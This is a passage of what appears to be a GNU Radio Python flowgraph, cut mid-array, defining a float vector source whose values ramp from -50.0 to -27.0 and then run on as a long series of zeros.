-48.5,-48.5,-48.6,-48.6,-48.7,-48.8,-48.8,-48.9,-48.9,-49.0,-49.1,-49.1,-49.2,-49.2,-49.3,-49.4,-49.4,-49.5,-49.5,-49.6,-49.7,-49.7,-49.8,-49.8,-49.9,-50.0,-50.0,-50.1,-50.1,-50.2,-50.3,-50.3,-50.4,-50.4,-50.5,-50.6,-50.6,-50.7,-50.7,-50.8,-50.9,-50.9,-51.0,-51.0,-51.1,-51.2,-51.2,-51.3,-51.3,-51.4,-51.5,-51.5,-51.6,-51.6,-51.7,-51.8,-51.8,-51.9,-51.9,-52.0,-52.1,-52.1,-52.2,-52.2,-52.3,-52.4,-52.4,-52.5,-52.5,-52.6,-52.7,-52.7,-52.8,-52.8,-52.9,-53.0,-53.0,-53.1,-53.1,-53.2,-53.3,-53.3,-53.4,-53.4,-53.5,-53.6,-53.6,-53.7,-53.7,-53.8,-53.9,-53.9,-54.0,-54.0,-54.1,-54.2,-54.2,-54.3,-54.3,-54.4,-54.5,-54.5,-54.6,-54.7,-54.7,-54.8,-54.8,-54.9,-55.0,-55.0,-55.1,-55.1,-55.2,-55.3,-55.3,-55.4,-55.4,-55.5,-55.6,-55.6,-55.7,-55.7,-55.8,-55.9,-55.9,-56.0,-56.0,-56.1,-56.2,-56.2,-56.3,-56.3,-56.4,-56.5,-56.5,-56.6,-56.6,-56.7,-56.8,-56.8,-56.9,-56.9,-57.0,-57.1,-57.1,-57.2,-57.2,-57.3,-57.4,-57.4,-57.5,-57.5,-57.6,-57.7,-57.7,-57.8,-57.8,-57.9,-58.0,-58.0,-58.1,-58.1,-58.2,-58.3,-58.3,-58.4,-58.4,-58.5,-58.6,-58.6,-58.7,-58.7,-58.8,-58.9,-58.9,-59.0,-59.0,-59.1,-59.2,-59.2,-59.3,-59.3,-59.4,-59.5,-59.5,-59.6,-59.6,-59.7,-59.8,-59.8,-59.9,-59.9,-60.0), True, 1, [])
self.blocks_vector_source_x_0_0 = blocks.vector_source_f((-50.0,-50.0,-49.9,-49.9,-49.8,-49.8,-49.7,-49.7,-49.7,-49.6,-49.6,-49.5,-49.5,-49.5,-49.4,-49.4,-49.3,-49.3,-49.2,-49.2,-49.2,-49.1,-49.1,-49.0,-49.0,-49.0,-48.9,-48.9,-48.8,-48.8,-48.7,-48.7,-48.7,-48.6,-48.6,-48.5,-48.5,-48.4,-48.4,-48.4,-48.3,-48.3,-48.2,-48.2,-48.2,-48.1,-48.1,-48.0,-48.0,-47.9,-47.9,-47.9,-47.8,-47.8,-47.7,-47.7,-47.7,-47.6,-47.6,-47.5,-47.5,-47.4,-47.4,-47.4,-47.3,-47.3,-47.2,-47.2,-47.2,-47.1,-47.1,-47.0,-47.0,-46.9,-46.9,-46.9,-46.8,-46.8,-46.7,-46.7,-46.6,-46.6,-46.6,-46.5,-46.5,-46.4,-46.4,-46.4,-46.3,-46.3,-46.2,-46.2,-46.1,-46.1,-46.1,-46.0,-46.0,-45.9,-45.9,-45.9,-45.8,-45.8,-45.7,-45.7,-45.6,-45.6,-45.6,-45.5,-45.5,-45.4,-45.4,-45.3,-45.3,-45.3,-45.2,-45.2,-45.1,-45.1,-45.1,-45.0,-45.0,-44.9,-44.9,-44.8,-44.8,-44.8,-44.7,-44.7,-44.6,-44.6,-44.6,-44.5,-44.5,-44.4,-44.4,-44.3,-44.3,-44.3,-44.2,-44.2,-44.1,-44.1,-44.1,-44.0,-44.0,-43.9,-43.9,-43.8,-43.8,-43.8,-43.7,-43.7,-43.6,-43.6,-43.5,-43.5,-43.5,-43.4,-43.4,-43.3,-43.3,-43.3,-43.2,-43.2,-43.1,-43.1,-43.0,-43.0,-43.0,-42.9,-42.9,-42.8,-42.8,-42.8,-42.7,-42.7,-42.6,-42.6,-42.5,-42.5,-42.5,-42.4,-42.4,-42.3,-42.3,-42.2,-42.2,-42.2,-42.1,-42.1,-42.0,-42.0,-42.0,-41.9,-41.9,-41.8,-41.8,-41.7,-41.7,-41.7,-41.6,-41.6,-41.5,-41.5,-41.5,-41.4,-41.4,-41.3,-41.3,-41.2,-41.2,-41.2,-41.1,-41.1,-41.0,-41.0,-41.0,-40.9,-40.9,-40.8,-40.8,-40.7,-40.7,-40.7,-40.6,-40.6,-40.5,-40.5,-40.4,-40.4,-40.4,-40.3,-40.3,-40.2,-40.2,-40.2,-40.1,-40.1,-40.0,-40.0,-39.9,-39.9,-39.9,-39.8,-39.8,-39.7,-39.7,-39.7,-39.6,-39.6,-39.5,-39.5,-39.4,-39.4,-39.4,-39.3,-39.3,-39.2,-39.2,-39.1,-39.1,-39.1,-39.0,-39.0,-38.9,-38.9,-38.9,-38.8,-38.8,-38.7,-38.7,-38.6,-38.6,-38.6,-38.5,-38.5,-38.4,-38.4,-38.4,-38.3,-38.3,-38.2,-38.2,-38.1,-38.1,-38.1,-38.0,-38.0,-37.9,-37.9,-37.9,-37.8,-37.8,-37.7,-37.7,-37.6,-37.6,-37.6,-37.5,-37.5,-37.4,-37.4,-37.3,-37.3,-37.3,-37.2,-37.2,-37.1,-37.1,-37.1,-37.0,-37.0,-36.9,-36.9,-36.8,-36.8,-36.8,-36.7,-36.7,-36.6,-36.6,-36.6,-36.5,-36.5,-36.4,-36.4,-36.3,-36.3,-36.3,-36.2,-36.2,-36.1,-36.1,-36.0,-36.0,-36.0,-35.9,-35.9,-35.8,-35.8,-35.8,-35.7,-35.7,-35.6,-35.6,-35.5,-35.5,-35.5,-35.4,-35.4,-35.3,-35.3,-35.3,-35.2,-35.2,-35.1,-35.1,-35.0,-35.0,-35.0,-34.9,-34.9,-34.8,-34.8,-34.8,-34.7,-34.7,-34.6,-34.6,-34.5,-34.5,-34.5,-34.4,-34.4,-34.3,-34.3,-34.2,-34.2,-34.2,-34.1,-34.1,-34.0,-34.0,-34.0,-33.9,-33.9,-33.8,-33.8,-33.7,-33.7,-33.7,-33.6,-33.6,-33.5,-33.5,-33.5,-33.4,-33.4,-33.3,-33.3,-33.2,-33.2,-33.2,-33.1,-33.1,-33.0,-33.0,-32.9,-32.9,-32.9,-32.8,-32.8,-32.7,-32.7,-32.7,-32.6,-32.6,-32.5,-32.5,-32.4,-32.4,-32.4,-32.3,-32.3,-32.2,-32.2,-32.2,-32.1,-32.1,-32.0,-32.0,-31.9,-31.9,-31.9,-31.8,-31.8,-31.7,-31.7,-31.7,-31.6,-31.6,-31.5,-31.5,-31.4,-31.4,-31.4,-31.3,-31.3,-31.2,-31.2,-31.1,-31.1,-31.1,-31.0,-31.0,-30.9,-30.9,-30.9,-30.8,-30.8,-30.7,-30.7,-30.6,-30.6,-30.6,-30.5,-30.5,-30.4,-30.4,-30.4,-30.3,-30.3,-30.2,-30.2,-30.1,-30.1,-30.1,-30.0,-30.0,-29.9,-29.9,-29.8,-29.8,-29.8,-29.7,-29.7,-29.6,-29.6,-29.6,-29.5,-29.5,-29.4,-29.4,-29.3,-29.3,-29.3,-29.2,-29.2,-29.1,-29.1,-29.1,-29.0,-29.0,-28.9,-28.9,-28.8,-28.8,-28.8,-28.7,-28.7,-28.6,-28.6,-28.6,-28.5,-28.5,-28.4,-28.4,-28.3,-28.3,-28.3,-28.2,-28.2,-28.1,-28.1,-28.0,-28.0,-28.0,-27.9,-27.9,-27.8,-27.8,-27.8,-27.7,-27.7,-27.6,-27.6,-27.5,-27.5,-27.5,-27.4,-27.4,-27.3,-27.3,-27.3,-27.2,-27.2,-27.1,-27.1,-27.0,-27.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,